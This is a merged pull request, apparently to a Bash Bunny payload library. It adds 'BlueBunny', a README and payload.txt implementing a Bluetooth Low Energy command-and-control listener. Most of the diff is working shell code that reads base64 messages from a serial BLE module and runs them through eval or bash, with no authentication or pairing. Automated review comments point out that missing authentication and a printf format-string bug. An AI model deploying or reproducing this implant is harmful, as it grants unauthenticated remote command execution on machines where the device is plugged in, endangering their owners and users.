Add BlueBunny #670

Merged
merged 3 commits into from
Jun 8, 2024
20 changes: 20 additions & 0 deletions payloads/library/remote_access/BlueBunny/README.md
@@ -0,0 +1,20 @@
# BlueBunny
* Author: 90N45
* Version: 1.0
* Category: Remote
* Attackmodes: NONE (Custom)

### Description
Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs on-demand over the air.

### Setup
This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)

### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Configuring BLE |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |

*Average runtime: 13 seconds*
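
Review bot: The Setup section does not tell the reader what the payload does once the LED reaches FINISH. payload.txt in this PR hands whatever arrives on /dev/ttyS1 to `eval` or `bash`, and nothing visible in it sets a PIN, a pairing requirement or a shared secret, so the README should say that plainly and describe how to stop the listener. In the same sentence, "remotly" should be "remotely", "form" should be "from", and the final period is missing.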
63 changes: 63 additions & 0 deletions payloads/library/remote_access/BlueBunny/payload.txt
@@ -0,0 +1,63 @@
#!/bin/bash
#
# Title: BlueBunny
# Description: BLE based C2 server for the Bash Bunny Mark II
# Author: 90N45
# Version: 1.0
# Category: Remote
# Attackmodes: NONE (Custom)

LED SETUP

# Enable serial BLE module
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1

# Configure BLE module as slave
echo -n -e "AT+ROLE=0" > /dev/ttyS1
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
echo -n -e "AT+ADV=1" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1

LED FINISH

while [[ true ]]; do
# Get incomming data from serial port
data=$(head -1 /dev/ttyS1)

# Decode base64 encoded data
data=$(echo ${data} | base64 -d)

# Echo data for debugging
echo "Debugger: ${data}"

# Single command
if [[ $data =~ "<CMD>" ]]; then
# Extract command
command=${data#*<CMD>}
command=${command%%<CMD>*}

# Run recieved command
eval "${command}"
fi

# Payload file
if [[ $data =~ "<PAYLOAD>" ]]; then
# Set payload file name
file="BlueBunnyPayload-${RANDOM}.txt"

# Extract file content
content=${data#*<PAYLOAD>}
content=${content%%<PAYLOAD>*}

# Write content to file
printf "${content}" > "${file}";

# Run payload
bash $file

# Remove payload file
rm $file
fi
done
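
Review bot: In the main loop the decoded data goes straight to `eval "${command}"` and `bash $file` with no check of who sent it; nothing in this file configures pairing or verifies a shared secret, so consider requiring an authenticator on each message (for example an HMAC keyed with a value set at setup time) before either branch runs. In the payload branch, `printf "${content}"` uses the received content as the format string, so any `%` or backslash in a payload is interpreted and the file written differs from what was sent; `printf '%s' "${content}" > "${file}"` avoids that. Smaller points: the `stty` line appears twice (if the repeat is deliberate, a comment should say why), `echo ${data}`, `bash $file` and `rm $file` should quote their expansions, the temporary file is created in the current directory under a `$RANDOM` name where `mktemp` would avoid collisions, `while [[ true ]]` can be `while true`, and the comments have "incomming" and "recieved" misspelled.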